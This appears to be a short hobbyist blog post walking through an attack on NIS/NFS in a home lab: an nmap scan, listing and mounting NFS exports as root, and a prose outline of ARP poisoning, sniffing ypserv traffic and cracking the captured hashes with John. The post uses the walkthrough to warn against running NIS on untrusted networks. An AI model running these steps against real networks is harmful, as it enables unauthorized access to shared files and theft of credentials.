So, okay i finally got done with YPServ / NIS, and it's just as unsecure as it has always been, so let's look at it.
We have a machine on the network, so let's seeif we can find a NIS server. Fire up Nmap, and have a look around.
nmap 10.0.0.1-255
Nmap scan report for 10.0.0.27
Host is up (0.000041s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
903/tcp open iss-console-mgr
2049/tcp open nfs
MAC Address: 08:00:27:68:EE:7B (Oracle VirtualBox virtual NIC)So we have a candidate, let's see if we can list some shares
showmount -e 10.0.0.27
Export list for 10.0.0.27:
/srv/shared 10.0.0.0/24
/home 10.0.0.0/24
We got two shares listed. Now, since we run as root on our Kali box, let's try to mount directly
mount -t nfs 10.0.0.27:/srv/shared /media/nx/nfsserverls /media/nx/nfsserver
blackdragon devel
So, we got two shares,
ls /media/nx/nfsserver/blackdragon
aig_test.txt
And, we got a user test file.
To umount, simply just do
umount /media/mountpointWhy was this possible ?. Because the server had wrong settings, that let's us, IF we're running as root on our local machine, mount all exported shares. The problem is that NIS just uses UID / GID, not usernames and passwords, so with root rights on the share, and UID/GID 0 on our system, we can mount everything.
Could we do something else ?. Yes. If we're seeing a client and a server, we could simply just use ARP poisoning to get the traffic between the server and client, fire up Wireshark, filter for ypserv, and see the raw data flowing between the server and the client. We would get the username and hash in clear text, copy that as plain text from the dump data, and go crack it with John and a good dictionary, like we did in Linux - cracking yescrypt hashes with John
So, did we learn anything ? Yep, don't use NIS unless you really..I mean REALLY trust the machines and users in your network ;)
Much Happy NIS Hacking